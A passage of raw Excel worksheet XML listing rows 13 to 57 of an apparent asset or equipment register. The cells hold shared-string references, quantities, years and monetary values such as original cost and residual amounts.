        <v>1384</v>
      </c>
      <c r="D13" s="238" t="s">
        <v>1378</v>
      </c>
      <c r="E13" s="238" t="s">
        <v>1385</v>
      </c>
      <c r="F13" s="11"/>
      <c r="G13" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H13" s="11">
        <v>1</v>
      </c>
      <c r="I13" s="237" t="s">
        <v>958</v>
      </c>
      <c r="J13" s="126">
        <v>33000</v>
      </c>
      <c r="K13" s="188">
        <v>5280</v>
      </c>
      <c r="L13" s="238" t="s">
        <v>1380</v>
      </c>
    </row>
    <row r="14" customHeight="1" spans="2:12">
      <c r="B14" s="16">
        <v>8</v>
      </c>
      <c r="C14" s="237" t="s">
        <v>1386</v>
      </c>
      <c r="D14" s="238" t="s">
        <v>1387</v>
      </c>
      <c r="E14" s="238" t="s">
        <v>1388</v>
      </c>
      <c r="F14" s="11"/>
      <c r="G14" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H14" s="11">
        <v>1</v>
      </c>
      <c r="I14" s="237" t="s">
        <v>1079</v>
      </c>
      <c r="J14" s="126">
        <v>33500</v>
      </c>
      <c r="K14" s="188">
        <v>7504</v>
      </c>
      <c r="L14" s="238" t="s">
        <v>1389</v>
      </c>
    </row>
    <row r="15" customHeight="1" spans="2:12">
      <c r="B15" s="16">
        <v>9</v>
      </c>
      <c r="C15" s="237" t="s">
        <v>1390</v>
      </c>
      <c r="D15" s="238" t="s">
        <v>1391</v>
      </c>
      <c r="E15" s="238" t="s">
        <v>1392</v>
      </c>
      <c r="F15" s="11"/>
      <c r="G15" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H15" s="11">
        <v>1</v>
      </c>
      <c r="I15" s="237" t="s">
        <v>1079</v>
      </c>
      <c r="J15" s="126">
        <v>27500</v>
      </c>
      <c r="K15" s="188">
        <v>6160</v>
      </c>
      <c r="L15" s="238" t="s">
        <v>1393</v>
      </c>
    </row>
    <row r="16" customHeight="1" spans="2:12">
      <c r="B16" s="16">
        <v>10</v>
      </c>
      <c r="C16" s="237" t="s">
        <v>1394</v>
      </c>
      <c r="D16" s="238" t="s">
        <v>1395</v>
      </c>
      <c r="E16" s="10"/>
      <c r="F16" s="11"/>
      <c r="G16" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H16" s="11">
        <v>3</v>
      </c>
      <c r="I16" s="237" t="s">
        <v>647</v>
      </c>
      <c r="J16" s="126">
        <v>1980</v>
      </c>
      <c r="K16" s="188">
        <v>633.6</v>
      </c>
      <c r="L16" s="238" t="s">
        <v>1396</v>
      </c>
    </row>
    <row r="17" customHeight="1" spans="2:12">
      <c r="B17" s="16">
        <v>11</v>
      </c>
      <c r="C17" s="237" t="s">
        <v>1397</v>
      </c>
      <c r="D17" s="238" t="s">
        <v>1378</v>
      </c>
      <c r="E17" s="10"/>
      <c r="F17" s="11"/>
      <c r="G17" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H17" s="11">
        <v>1</v>
      </c>
      <c r="I17" s="237" t="s">
        <v>725</v>
      </c>
      <c r="J17" s="126">
        <v>92000</v>
      </c>
      <c r="K17" s="188">
        <v>29440</v>
      </c>
      <c r="L17" s="238" t="s">
        <v>1398</v>
      </c>
    </row>
    <row r="18" customHeight="1" spans="2:12">
      <c r="B18" s="16">
        <v>12</v>
      </c>
      <c r="C18" s="237" t="s">
        <v>1399</v>
      </c>
      <c r="D18" s="238" t="s">
        <v>1400</v>
      </c>
      <c r="E18" s="10"/>
      <c r="F18" s="11"/>
      <c r="G18" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H18" s="11">
        <v>1</v>
      </c>
      <c r="I18" s="237" t="s">
        <v>725</v>
      </c>
      <c r="J18" s="126">
        <v>42000</v>
      </c>
      <c r="K18" s="188">
        <v>13440</v>
      </c>
      <c r="L18" s="238" t="s">
        <v>1401</v>
      </c>
    </row>
    <row r="19" customHeight="1" spans="2:12">
      <c r="B19" s="16">
        <v>13</v>
      </c>
      <c r="C19" s="237" t="s">
        <v>1402</v>
      </c>
      <c r="D19" s="238" t="s">
        <v>1403</v>
      </c>
      <c r="E19" s="238" t="s">
        <v>1404</v>
      </c>
      <c r="F19" s="11"/>
      <c r="G19" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H19" s="11">
        <v>1</v>
      </c>
      <c r="I19" s="237" t="s">
        <v>1405</v>
      </c>
      <c r="J19" s="126">
        <v>396000</v>
      </c>
      <c r="K19" s="188">
        <v>114048</v>
      </c>
      <c r="L19" s="238" t="s">
        <v>1406</v>
      </c>
    </row>
    <row r="20" customHeight="1" spans="2:12">
      <c r="B20" s="16">
        <v>14</v>
      </c>
      <c r="C20" s="237" t="s">
        <v>1407</v>
      </c>
      <c r="D20" s="238" t="s">
        <v>1408</v>
      </c>
      <c r="E20" s="238" t="s">
        <v>1409</v>
      </c>
      <c r="F20" s="11"/>
      <c r="G20" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H20" s="11">
        <v>5</v>
      </c>
      <c r="I20" s="237" t="s">
        <v>647</v>
      </c>
      <c r="J20" s="126">
        <v>202740</v>
      </c>
      <c r="K20" s="188">
        <v>64876.8</v>
      </c>
      <c r="L20" s="238" t="s">
        <v>1406</v>
      </c>
    </row>
    <row r="21" customHeight="1" spans="2:12">
      <c r="B21" s="16">
        <v>15</v>
      </c>
      <c r="C21" s="237" t="s">
        <v>1411</v>
      </c>
      <c r="D21" s="238" t="s">
        <v>1412</v>
      </c>
      <c r="E21" s="238" t="s">
        <v>1409</v>
      </c>
      <c r="F21" s="11"/>
      <c r="G21" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H21" s="11">
        <v>12</v>
      </c>
      <c r="I21" s="237" t="s">
        <v>647</v>
      </c>
      <c r="J21" s="126">
        <v>431125</v>
      </c>
      <c r="K21" s="188">
        <v>192000</v>
      </c>
      <c r="L21" s="238" t="s">
        <v>1406</v>
      </c>
    </row>
    <row r="22" customHeight="1" spans="2:12">
      <c r="B22" s="16">
        <v>16</v>
      </c>
      <c r="C22" s="237" t="s">
        <v>1413</v>
      </c>
      <c r="D22" s="238" t="s">
        <v>1414</v>
      </c>
      <c r="E22" s="238" t="s">
        <v>1409</v>
      </c>
      <c r="F22" s="11"/>
      <c r="G22" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H22" s="11">
        <v>6</v>
      </c>
      <c r="I22" s="237" t="s">
        <v>1013</v>
      </c>
      <c r="J22" s="126">
        <v>290000</v>
      </c>
      <c r="K22" s="188">
        <v>96000</v>
      </c>
      <c r="L22" s="238" t="s">
        <v>1406</v>
      </c>
    </row>
    <row r="23" customHeight="1" spans="2:12">
      <c r="B23" s="16">
        <v>17</v>
      </c>
      <c r="C23" s="237" t="s">
        <v>1415</v>
      </c>
      <c r="D23" s="238" t="s">
        <v>1412</v>
      </c>
      <c r="E23" s="238" t="s">
        <v>1416</v>
      </c>
      <c r="F23" s="11"/>
      <c r="G23" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H23" s="11">
        <v>4</v>
      </c>
      <c r="I23" s="237" t="s">
        <v>1417</v>
      </c>
      <c r="J23" s="126">
        <v>246512.82</v>
      </c>
      <c r="K23" s="188">
        <v>83200</v>
      </c>
      <c r="L23" s="238" t="s">
        <v>1406</v>
      </c>
    </row>
    <row r="24" customHeight="1" spans="1:12">
      <c r="A24" s="176">
        <v>1</v>
      </c>
      <c r="B24" s="16">
        <v>18</v>
      </c>
      <c r="C24" s="237" t="s">
        <v>1418</v>
      </c>
      <c r="D24" s="238" t="s">
        <v>1419</v>
      </c>
      <c r="E24" s="238" t="s">
        <v>1420</v>
      </c>
      <c r="F24" s="11"/>
      <c r="G24" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H24" s="11">
        <v>1</v>
      </c>
      <c r="I24" s="237" t="s">
        <v>1417</v>
      </c>
      <c r="J24" s="126">
        <v>123931.62</v>
      </c>
      <c r="K24" s="188">
        <v>59280</v>
      </c>
      <c r="L24" s="238" t="s">
        <v>1406</v>
      </c>
    </row>
    <row r="25" customHeight="1" spans="2:12">
      <c r="B25" s="16">
        <v>19</v>
      </c>
      <c r="C25" s="237" t="s">
        <v>1421</v>
      </c>
      <c r="D25" s="238" t="s">
        <v>1422</v>
      </c>
      <c r="E25" s="238" t="s">
        <v>1423</v>
      </c>
      <c r="F25" s="11"/>
      <c r="G25" s="16"/>
      <c r="H25" s="11">
        <v>1</v>
      </c>
      <c r="I25" s="237" t="s">
        <v>647</v>
      </c>
      <c r="J25" s="126">
        <v>153000</v>
      </c>
      <c r="K25" s="188">
        <v>0</v>
      </c>
      <c r="L25" s="238" t="s">
        <v>1424</v>
      </c>
    </row>
    <row r="26" customHeight="1" spans="2:12">
      <c r="B26" s="16">
        <v>20</v>
      </c>
      <c r="C26" s="237" t="s">
        <v>1425</v>
      </c>
      <c r="D26" s="238" t="s">
        <v>1426</v>
      </c>
      <c r="E26" s="238" t="s">
        <v>1427</v>
      </c>
      <c r="F26" s="11"/>
      <c r="G26" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H26" s="11">
        <v>1</v>
      </c>
      <c r="I26" s="237" t="s">
        <v>432</v>
      </c>
      <c r="J26" s="126">
        <v>23931.62</v>
      </c>
      <c r="K26" s="188">
        <v>0</v>
      </c>
      <c r="L26" s="238" t="s">
        <v>1428</v>
      </c>
    </row>
    <row r="27" customHeight="1" spans="2:12">
      <c r="B27" s="16">
        <v>21</v>
      </c>
      <c r="C27" s="237" t="s">
        <v>1429</v>
      </c>
      <c r="D27" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E27" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F27" s="11"/>
      <c r="G27" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H27" s="11">
        <v>1</v>
      </c>
      <c r="I27" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J27" s="126">
        <v>31300</v>
      </c>
      <c r="K27" s="188">
        <v>928</v>
      </c>
      <c r="L27" s="238" t="s">
        <v>1432</v>
      </c>
    </row>
    <row r="28" customHeight="1" spans="2:12">
      <c r="B28" s="16">
        <v>22</v>
      </c>
      <c r="C28" s="237" t="s">
        <v>1433</v>
      </c>
      <c r="D28" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E28" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F28" s="11"/>
      <c r="G28" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H28" s="11">
        <v>7</v>
      </c>
      <c r="I28" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J28" s="126">
        <v>29000</v>
      </c>
      <c r="K28" s="188">
        <v>6496</v>
      </c>
      <c r="L28" s="238" t="s">
        <v>1432</v>
      </c>
    </row>
    <row r="29" customHeight="1" spans="2:12">
      <c r="B29" s="16">
        <v>23</v>
      </c>
      <c r="C29" s="237" t="s">
        <v>1434</v>
      </c>
      <c r="D29" s="238" t="s">
        <v>1435</v>
      </c>
      <c r="E29" s="238" t="s">
        <v>1349</v>
      </c>
      <c r="F29" s="16" t="s">
        <v>1436</v>
      </c>
      <c r="G29" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H29" s="11">
        <v>5</v>
      </c>
      <c r="I29" s="11">
        <v>1989</v>
      </c>
      <c r="J29" s="126">
        <v>155280</v>
      </c>
      <c r="K29" s="188">
        <v>3200</v>
      </c>
      <c r="L29" s="238" t="s">
        <v>1437</v>
      </c>
    </row>
    <row r="30" customHeight="1" spans="2:12">
      <c r="B30" s="16">
        <v>24</v>
      </c>
      <c r="C30" s="237" t="s">
        <v>1438</v>
      </c>
      <c r="D30" s="238" t="s">
        <v>1426</v>
      </c>
      <c r="E30" s="238" t="s">
        <v>1439</v>
      </c>
      <c r="F30" s="16"/>
      <c r="G30" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H30" s="11">
        <v>1</v>
      </c>
      <c r="I30" s="237" t="s">
        <v>871</v>
      </c>
      <c r="J30" s="126">
        <v>64000</v>
      </c>
      <c r="K30" s="188">
        <v>0</v>
      </c>
      <c r="L30" s="238" t="s">
        <v>1440</v>
      </c>
    </row>
    <row r="31" customHeight="1" spans="2:12">
      <c r="B31" s="16">
        <v>25</v>
      </c>
      <c r="C31" s="237" t="s">
        <v>1441</v>
      </c>
      <c r="D31" s="238" t="s">
        <v>1364</v>
      </c>
      <c r="E31" s="238" t="s">
        <v>1365</v>
      </c>
      <c r="F31" s="16"/>
      <c r="G31" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H31" s="11">
        <v>1</v>
      </c>
      <c r="I31" s="237" t="s">
        <v>1442</v>
      </c>
      <c r="J31" s="126">
        <v>7000</v>
      </c>
      <c r="K31" s="188">
        <v>1344</v>
      </c>
      <c r="L31" s="238" t="s">
        <v>1443</v>
      </c>
    </row>
    <row r="32" customHeight="1" spans="2:12">
      <c r="B32" s="16">
        <v>26</v>
      </c>
      <c r="C32" s="237" t="s">
        <v>1444</v>
      </c>
      <c r="D32" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E32" s="238" t="s">
        <v>1445</v>
      </c>
      <c r="F32" s="16"/>
      <c r="G32" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H32" s="11">
        <v>7</v>
      </c>
      <c r="I32" s="237" t="s">
        <v>1417</v>
      </c>
      <c r="J32" s="126">
        <v>162888.9</v>
      </c>
      <c r="K32" s="188">
        <v>21112</v>
      </c>
      <c r="L32" s="238" t="s">
        <v>1446</v>
      </c>
    </row>
    <row r="33" customHeight="1" spans="2:12">
      <c r="B33" s="16">
        <v>27</v>
      </c>
      <c r="C33" s="237" t="s">
        <v>1447</v>
      </c>
      <c r="D33" s="238" t="s">
        <v>1448</v>
      </c>
      <c r="E33" s="238" t="s">
        <v>1365</v>
      </c>
      <c r="F33" s="16"/>
      <c r="G33" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H33" s="11">
        <v>1</v>
      </c>
      <c r="I33" s="237" t="s">
        <v>1035</v>
      </c>
      <c r="J33" s="126">
        <v>7500</v>
      </c>
      <c r="K33" s="188">
        <v>1680</v>
      </c>
      <c r="L33" s="238" t="s">
        <v>1449</v>
      </c>
    </row>
    <row r="34" customHeight="1" spans="2:12">
      <c r="B34" s="16">
        <v>28</v>
      </c>
      <c r="C34" s="237" t="s">
        <v>1450</v>
      </c>
      <c r="D34" s="238" t="s">
        <v>1451</v>
      </c>
      <c r="E34" s="238" t="s">
        <v>1452</v>
      </c>
      <c r="F34" s="16" t="s">
        <v>1453</v>
      </c>
      <c r="G34" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H34" s="11">
        <v>1</v>
      </c>
      <c r="I34" s="237" t="s">
        <v>336</v>
      </c>
      <c r="J34" s="126">
        <v>6579</v>
      </c>
      <c r="K34" s="188">
        <v>1856</v>
      </c>
      <c r="L34" s="238" t="s">
        <v>1454</v>
      </c>
    </row>
    <row r="35" customHeight="1" spans="2:12">
      <c r="B35" s="16">
        <v>29</v>
      </c>
      <c r="C35" s="237" t="s">
        <v>1455</v>
      </c>
      <c r="D35" s="238" t="s">
        <v>1451</v>
      </c>
      <c r="E35" s="238" t="s">
        <v>1456</v>
      </c>
      <c r="F35" s="16"/>
      <c r="G35" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H35" s="11">
        <v>1</v>
      </c>
      <c r="I35" s="237" t="s">
        <v>336</v>
      </c>
      <c r="J35" s="126">
        <v>12751</v>
      </c>
      <c r="K35" s="188">
        <v>1856</v>
      </c>
      <c r="L35" s="238" t="s">
        <v>1457</v>
      </c>
    </row>
    <row r="36" customHeight="1" spans="2:12">
      <c r="B36" s="16">
        <v>30</v>
      </c>
      <c r="C36" s="237" t="s">
        <v>1458</v>
      </c>
      <c r="D36" s="238" t="s">
        <v>1451</v>
      </c>
      <c r="E36" s="238" t="s">
        <v>1349</v>
      </c>
      <c r="F36" s="11"/>
      <c r="G36" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H36" s="11">
        <v>1</v>
      </c>
      <c r="I36" s="237" t="s">
        <v>1459</v>
      </c>
      <c r="J36" s="126">
        <v>7969</v>
      </c>
      <c r="K36" s="188">
        <v>1856</v>
      </c>
      <c r="L36" s="238" t="s">
        <v>1457</v>
      </c>
    </row>
    <row r="37" customHeight="1" spans="2:12">
      <c r="B37" s="16">
        <v>31</v>
      </c>
      <c r="C37" s="237" t="s">
        <v>1460</v>
      </c>
      <c r="D37" s="238" t="s">
        <v>1451</v>
      </c>
      <c r="E37" s="238" t="s">
        <v>1349</v>
      </c>
      <c r="F37" s="11"/>
      <c r="G37" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H37" s="11">
        <v>1</v>
      </c>
      <c r="I37" s="237" t="s">
        <v>1461</v>
      </c>
      <c r="J37" s="126">
        <v>7000</v>
      </c>
      <c r="K37" s="188">
        <v>1856</v>
      </c>
      <c r="L37" s="238" t="s">
        <v>1457</v>
      </c>
    </row>
    <row r="38" customHeight="1" spans="2:12">
      <c r="B38" s="16">
        <v>32</v>
      </c>
      <c r="C38" s="237" t="s">
        <v>1462</v>
      </c>
      <c r="D38" s="238" t="s">
        <v>1463</v>
      </c>
      <c r="E38" s="238" t="s">
        <v>1464</v>
      </c>
      <c r="F38" s="11"/>
      <c r="G38" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H38" s="11">
        <v>2</v>
      </c>
      <c r="I38" s="237" t="s">
        <v>1465</v>
      </c>
      <c r="J38" s="126">
        <v>9700</v>
      </c>
      <c r="K38" s="188">
        <v>3104</v>
      </c>
      <c r="L38" s="238" t="s">
        <v>1466</v>
      </c>
    </row>
    <row r="39" customHeight="1" spans="2:12">
      <c r="B39" s="16">
        <v>33</v>
      </c>
      <c r="C39" s="237" t="s">
        <v>1467</v>
      </c>
      <c r="D39" s="238" t="s">
        <v>1463</v>
      </c>
      <c r="E39" s="238" t="s">
        <v>1468</v>
      </c>
      <c r="F39" s="11"/>
      <c r="G39" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H39" s="11">
        <v>1</v>
      </c>
      <c r="I39" s="237" t="s">
        <v>1465</v>
      </c>
      <c r="J39" s="126">
        <v>8500</v>
      </c>
      <c r="K39" s="188">
        <v>2720</v>
      </c>
      <c r="L39" s="238" t="s">
        <v>1466</v>
      </c>
    </row>
    <row r="40" customHeight="1" spans="2:12">
      <c r="B40" s="16">
        <v>34</v>
      </c>
      <c r="C40" s="237" t="s">
        <v>1469</v>
      </c>
      <c r="D40" s="238" t="s">
        <v>1463</v>
      </c>
      <c r="E40" s="238" t="s">
        <v>1470</v>
      </c>
      <c r="F40" s="11"/>
      <c r="G40" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H40" s="11">
        <v>1</v>
      </c>
      <c r="I40" s="237" t="s">
        <v>962</v>
      </c>
      <c r="J40" s="126">
        <v>27500</v>
      </c>
      <c r="K40" s="188">
        <v>4400</v>
      </c>
      <c r="L40" s="238" t="s">
        <v>1471</v>
      </c>
    </row>
    <row r="41" customHeight="1" spans="2:12">
      <c r="B41" s="16">
        <v>35</v>
      </c>
      <c r="C41" s="237" t="s">
        <v>1472</v>
      </c>
      <c r="D41" s="238" t="s">
        <v>1473</v>
      </c>
      <c r="E41" s="238" t="s">
        <v>1474</v>
      </c>
      <c r="F41" s="11"/>
      <c r="G41" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H41" s="11">
        <v>1</v>
      </c>
      <c r="I41" s="237" t="s">
        <v>1475</v>
      </c>
      <c r="J41" s="126">
        <v>21196.58</v>
      </c>
      <c r="K41" s="188">
        <v>0</v>
      </c>
      <c r="L41" s="238" t="s">
        <v>1476</v>
      </c>
    </row>
    <row r="42" customHeight="1" spans="2:12">
      <c r="B42" s="16">
        <v>36</v>
      </c>
      <c r="C42" s="237" t="s">
        <v>1477</v>
      </c>
      <c r="D42" s="238" t="s">
        <v>1478</v>
      </c>
      <c r="E42" s="10"/>
      <c r="F42" s="11"/>
      <c r="G42" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H42" s="11">
        <v>1</v>
      </c>
      <c r="I42" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J42" s="126">
        <v>2600</v>
      </c>
      <c r="K42" s="188">
        <v>332.8</v>
      </c>
      <c r="L42" s="238" t="s">
        <v>1479</v>
      </c>
    </row>
    <row r="43" customHeight="1" spans="2:12">
      <c r="B43" s="16">
        <v>37</v>
      </c>
      <c r="C43" s="237" t="s">
        <v>1480</v>
      </c>
      <c r="D43" s="238" t="s">
        <v>1478</v>
      </c>
      <c r="E43" s="10"/>
      <c r="F43" s="11"/>
      <c r="G43" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H43" s="11">
        <v>1</v>
      </c>
      <c r="I43" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J43" s="14">
        <v>600</v>
      </c>
      <c r="K43" s="188">
        <v>76.8</v>
      </c>
      <c r="L43" s="238" t="s">
        <v>1479</v>
      </c>
    </row>
    <row r="44" customHeight="1" spans="2:12">
      <c r="B44" s="16">
        <v>38</v>
      </c>
      <c r="C44" s="237" t="s">
        <v>1481</v>
      </c>
      <c r="D44" s="238" t="s">
        <v>1482</v>
      </c>
      <c r="E44" s="10"/>
      <c r="F44" s="11"/>
      <c r="G44" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H44" s="11">
        <v>1</v>
      </c>
      <c r="I44" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J44" s="14">
        <v>400</v>
      </c>
      <c r="K44" s="188">
        <v>51.2</v>
      </c>
      <c r="L44" s="238" t="s">
        <v>1479</v>
      </c>
    </row>
    <row r="45" customHeight="1" spans="2:12">
      <c r="B45" s="16">
        <v>39</v>
      </c>
      <c r="C45" s="237" t="s">
        <v>1483</v>
      </c>
      <c r="D45" s="238" t="s">
        <v>1478</v>
      </c>
      <c r="E45" s="10"/>
      <c r="F45" s="11"/>
      <c r="G45" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H45" s="11">
        <v>1</v>
      </c>
      <c r="I45" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J45" s="14">
        <v>600</v>
      </c>
      <c r="K45" s="188">
        <v>76.8</v>
      </c>
      <c r="L45" s="238" t="s">
        <v>1479</v>
      </c>
    </row>
    <row r="46" customHeight="1" spans="2:12">
      <c r="B46" s="16">
        <v>40</v>
      </c>
      <c r="C46" s="237" t="s">
        <v>1484</v>
      </c>
      <c r="D46" s="238" t="s">
        <v>1387</v>
      </c>
      <c r="E46" s="238" t="s">
        <v>1485</v>
      </c>
      <c r="F46" s="11"/>
      <c r="G46" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H46" s="11">
        <v>1</v>
      </c>
      <c r="I46" s="237" t="s">
        <v>962</v>
      </c>
      <c r="J46" s="126">
        <v>21000</v>
      </c>
      <c r="K46" s="188">
        <v>3536</v>
      </c>
      <c r="L46" s="238" t="s">
        <v>1486</v>
      </c>
    </row>
    <row r="47" customHeight="1" spans="2:12">
      <c r="B47" s="16">
        <v>41</v>
      </c>
      <c r="C47" s="237" t="s">
        <v>1487</v>
      </c>
      <c r="D47" s="238" t="s">
        <v>1387</v>
      </c>
      <c r="E47" s="238" t="s">
        <v>1488</v>
      </c>
      <c r="F47" s="11"/>
      <c r="G47" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H47" s="11">
        <v>2</v>
      </c>
      <c r="I47" s="237" t="s">
        <v>1021</v>
      </c>
      <c r="J47" s="126">
        <v>45648</v>
      </c>
      <c r="K47" s="188">
        <v>9900.8</v>
      </c>
      <c r="L47" s="238" t="s">
        <v>1486</v>
      </c>
    </row>
    <row r="48" customHeight="1" spans="2:12">
      <c r="B48" s="16">
        <v>42</v>
      </c>
      <c r="C48" s="237" t="s">
        <v>1489</v>
      </c>
      <c r="D48" s="238" t="s">
        <v>1463</v>
      </c>
      <c r="E48" s="238" t="s">
        <v>1490</v>
      </c>
      <c r="F48" s="11"/>
      <c r="G48" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H48" s="11">
        <v>2</v>
      </c>
      <c r="I48" s="237" t="s">
        <v>1100</v>
      </c>
      <c r="J48" s="126">
        <v>7800</v>
      </c>
      <c r="K48" s="188">
        <v>1996.8</v>
      </c>
      <c r="L48" s="238" t="s">
        <v>1491</v>
      </c>
    </row>
    <row r="49" customHeight="1" spans="2:12">
      <c r="B49" s="16">
        <v>43</v>
      </c>
      <c r="C49" s="11"/>
      <c r="D49" s="10" t="s">
        <v>1492</v>
      </c>
      <c r="E49" s="10"/>
      <c r="F49" s="11"/>
      <c r="G49" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H49" s="11">
        <v>2</v>
      </c>
      <c r="I49" s="11"/>
      <c r="J49" s="205"/>
      <c r="K49" s="188">
        <v>1120</v>
      </c>
      <c r="L49" s="191" t="s">
        <v>1491</v>
      </c>
    </row>
    <row r="50" customHeight="1" spans="2:12">
      <c r="B50" s="16">
        <v>44</v>
      </c>
      <c r="C50" s="237" t="s">
        <v>1493</v>
      </c>
      <c r="D50" s="238" t="s">
        <v>1494</v>
      </c>
      <c r="E50" s="238" t="s">
        <v>1495</v>
      </c>
      <c r="F50" s="11" t="s">
        <v>1496</v>
      </c>
      <c r="G50" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H50" s="11">
        <v>1</v>
      </c>
      <c r="I50" s="237" t="s">
        <v>1497</v>
      </c>
      <c r="J50" s="126">
        <v>130000</v>
      </c>
      <c r="K50" s="188">
        <v>20800</v>
      </c>
      <c r="L50" s="238" t="s">
        <v>1498</v>
      </c>
    </row>
    <row r="51" customHeight="1" spans="2:12">
      <c r="B51" s="16">
        <v>45</v>
      </c>
      <c r="C51" s="237" t="s">
        <v>1499</v>
      </c>
      <c r="D51" s="238" t="s">
        <v>1500</v>
      </c>
      <c r="E51" s="238" t="s">
        <v>1501</v>
      </c>
      <c r="F51" s="11"/>
      <c r="G51" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="H51" s="11">
        <v>1</v>
      </c>
      <c r="I51" s="237" t="s">
        <v>1497</v>
      </c>
      <c r="J51" s="126">
        <v>50000</v>
      </c>
      <c r="K51" s="188">
        <v>8000</v>
      </c>
      <c r="L51" s="238" t="s">
        <v>1498</v>
      </c>
    </row>
    <row r="52" customHeight="1" spans="2:12">
      <c r="B52" s="16">
        <v>46</v>
      </c>
      <c r="C52" s="237" t="s">
        <v>1502</v>
      </c>
      <c r="D52" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E52" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F52" s="11"/>
      <c r="G52" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H52" s="11">
        <v>1</v>
      </c>
      <c r="I52" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J52" s="126">
        <v>10000</v>
      </c>
      <c r="K52" s="188">
        <v>928</v>
      </c>
      <c r="L52" s="238" t="s">
        <v>1503</v>
      </c>
    </row>
    <row r="53" customHeight="1" spans="2:12">
      <c r="B53" s="16">
        <v>47</v>
      </c>
      <c r="C53" s="237" t="s">
        <v>1504</v>
      </c>
      <c r="D53" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E53" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F53" s="11"/>
      <c r="G53" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H53" s="11">
        <v>1</v>
      </c>
      <c r="I53" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J53" s="126">
        <v>10000</v>
      </c>
      <c r="K53" s="188">
        <v>928</v>
      </c>
      <c r="L53" s="238" t="s">
        <v>1503</v>
      </c>
    </row>
    <row r="54" customHeight="1" spans="2:12">
      <c r="B54" s="16">
        <v>48</v>
      </c>
      <c r="C54" s="237" t="s">
        <v>1505</v>
      </c>
      <c r="D54" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E54" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F54" s="11"/>
      <c r="G54" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H54" s="11">
        <v>1</v>
      </c>
      <c r="I54" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J54" s="126">
        <v>10000</v>
      </c>
      <c r="K54" s="188">
        <v>928</v>
      </c>
      <c r="L54" s="238" t="s">
        <v>1503</v>
      </c>
    </row>
    <row r="55" customHeight="1" spans="2:12">
      <c r="B55" s="16">
        <v>49</v>
      </c>
      <c r="C55" s="237" t="s">
        <v>1506</v>
      </c>
      <c r="D55" s="238" t="s">
        <v>1430</v>
      </c>
      <c r="E55" s="238" t="s">
        <v>1431</v>
      </c>
      <c r="F55" s="11"/>
      <c r="G55" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H55" s="11">
        <v>1</v>
      </c>
      <c r="I55" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J55" s="126">
        <v>30000</v>
      </c>
      <c r="K55" s="188">
        <v>928</v>
      </c>
      <c r="L55" s="238" t="s">
        <v>1503</v>
      </c>
    </row>
    <row r="56" customHeight="1" spans="2:12">
      <c r="B56" s="16">
        <v>50</v>
      </c>
      <c r="C56" s="237" t="s">
        <v>1507</v>
      </c>
      <c r="D56" s="238" t="s">
        <v>1508</v>
      </c>
      <c r="E56" s="238" t="s">
        <v>1509</v>
      </c>
      <c r="F56" s="11" t="s">
        <v>1510</v>
      </c>
      <c r="G56" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H56" s="11">
        <v>3</v>
      </c>
      <c r="I56" s="11">
        <v>1996</v>
      </c>
      <c r="J56" s="126">
        <v>23000</v>
      </c>
      <c r="K56" s="188">
        <v>4800</v>
      </c>
      <c r="L56" s="238" t="s">
        <v>1511</v>
      </c>
    </row>
    <row r="57" customHeight="1" spans="2:12">
      <c r="B57" s="16">
        <v>51</v>
      </c>
      <c r="C57" s="237" t="s">
        <v>1512</v>
      </c>
